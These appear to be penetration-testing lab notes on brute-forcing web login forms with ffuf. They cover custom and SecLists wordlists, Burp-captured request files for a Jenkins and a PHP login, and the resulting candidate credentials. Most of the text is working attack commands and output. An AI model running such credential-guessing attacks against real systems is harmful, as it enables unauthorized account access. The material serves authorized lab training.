FFUF

OPTION 1: CUSTOM WORDLIST

root@oco:~$ ffuf -w ./customPWList.txt -u http://94.237.59.180:47925/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"


root@oco:~$ ffuf -w allowed.userlist:USER -w allowed.userlist.passwd:PASS -u http://10.129.1.15/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "Username=USER&Password=PASS" -fr "Warning! Incorrect information."

OPTION 2: FFUF W/ BURP

root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.178.161:8080
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
 Welcome to Jenkins!
 Username: null
 Password: null
 
 * forward request
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 POST /j_spring_security_check HTTP/1.1
 Host: 10.129.178.161:8080
 Content-Length: 55
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://10.129.178.161:8080
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.178.161:8080/login?from=%2F
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
 Connection: close

 j_username=null&j_password=null&from=%2F&Submit=Sign+in
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in

 * replace the submitted username/password values with unique keyword markers (unameFUZZ / pwFUZZ); ffuf substitutes every occurrence of a keyword string in the request, so choose markers that appear nowhere else (a bare FUZZ keyword would also match inside unameFUZZ)

root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password"
 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
    * PFUZZ: root
    * UFUZZ: admin

 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
    * PFUZZ: password1
    * UFUZZ: admin

 * the 302 responses above carry an empty body (Size: 0), so the -fr regex never matches and nothing is filtered out; add -r so ffuf follows the redirect and applies the filter to the final page instead of the redirect itself
root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r
 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: admin1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
    * PFUZZ: password
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: root
    * UFUZZ: root

 [Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
    * PFUZZ: password1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
    * PFUZZ: admin
    * UFUZZ: root

root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540
 * set the -fs value to the body size the previous run reported for failed logins (the 17516 rows above); sizes can drift by a few bytes when the page embeds dynamic content (note the 17514 row), so filtering on a regex for the failure text, or on -fw/-fl, is usually more reliable than an exact size

 * -c colorizes the output
 * -r follows HTTP redirects, so filters and matchers are applied to the final response rather than to the 302
 * -fs SIZE filters out responses whose body is exactly SIZE bytes (brittle on pages with dynamic content)
 * -fr REGEX filters out responses whose body matches the regex (the failure message)

 * the remaining rows are candidate credentials, not confirmed ones: verify each pair manually before relying on it
 * brute-forcing a login can trigger account lockout or rate limiting; check the target's policy first and throttle with -rate / -p if needed

OPTION 3: SECLISTS WORDLISTS + BURP REQUEST FILE

#walk the application
root@htb:~$ BROWSER > http://10.129.140.205/
 username: admin
 password: pass
 error msg: Wrong Credentials
 
 * login page identified

#conduct code review
root@htb:~$ BROWSER > http://10.129.140.205/ > CTRL+U

 * nothing pertinent
#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
 /usr/share/seclists/Usernames
root@htb:~$ ls /usr/share/seclists/Usernames
 top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ find / -iname passwords 2>/dev/null
 /usr/share/seclists/Passwords
root@htb:~$ ls /usr/share/seclists/Passwords
 500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .

#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.140.205
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.140.205
 Welcome ...
 Username: admin
 Password: pass
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 POST / HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 28
 Cache-Control: max-age=0
 Accept-Language: en-US,en;q=0.9
 Origin: http://10.129.140.205
 Content-Type: application/x-www-form-urlencoded
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.140.205/
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 username=admin&password=pass
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 username=unameFUZZ&password=passFUZZ
 * (the j_username/j_password body line from Option 2 belongs to the Jenkins target, not to this file; requests.txt must contain exactly one request, ending with this single body line)

 * replace the submitted username/password values with unique keyword markers (unameFUZZ / passFUZZ); ffuf substitutes every occurrence of a keyword string in the request, so choose markers that appear nowhere else in it
 
root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r
 [Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
    * passFUZZ: password
    * unameFUZZ: admin

 :: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::

 * the keyword after the colon in each -w file:KEYWORD must match the marker in requests.txt byte for byte, otherwise ffuf will not substitute that position
 * ffuf's default multi-wordlist mode is clusterbomb (-mode clusterbomb), not pitchfork
    - clusterbomb tries every combination of the wordlists, like a nested loop over each payload set
      (Burp Intruder's "cluster bomb" attack type)
    - pitchfork (-mode pitchfork) pairs the wordlists line by line: entry N of the first with entry N of the second
    - either mode needs one -w file:KEYWORD per payload position; -request-proto only sets the scheme
      (http/https) used with -request and has nothing to do with the attack mode

 * -c colorizes the output
 * -r follows HTTP redirects, so filters and matchers are applied to the final response rather than to a 302
 * -fs SIZE filters out responses whose body is exactly SIZE bytes (brittle on pages with dynamic content)
 * -fr REGEX filters out responses whose body matches the regex (the failure message)

 * the remaining rows are candidate credentials, not confirmed ones: verify each pair manually before relying on it
 * brute-forcing a login can trigger account lockout or rate limiting; check the target's policy first and throttle with -rate / -p if needed
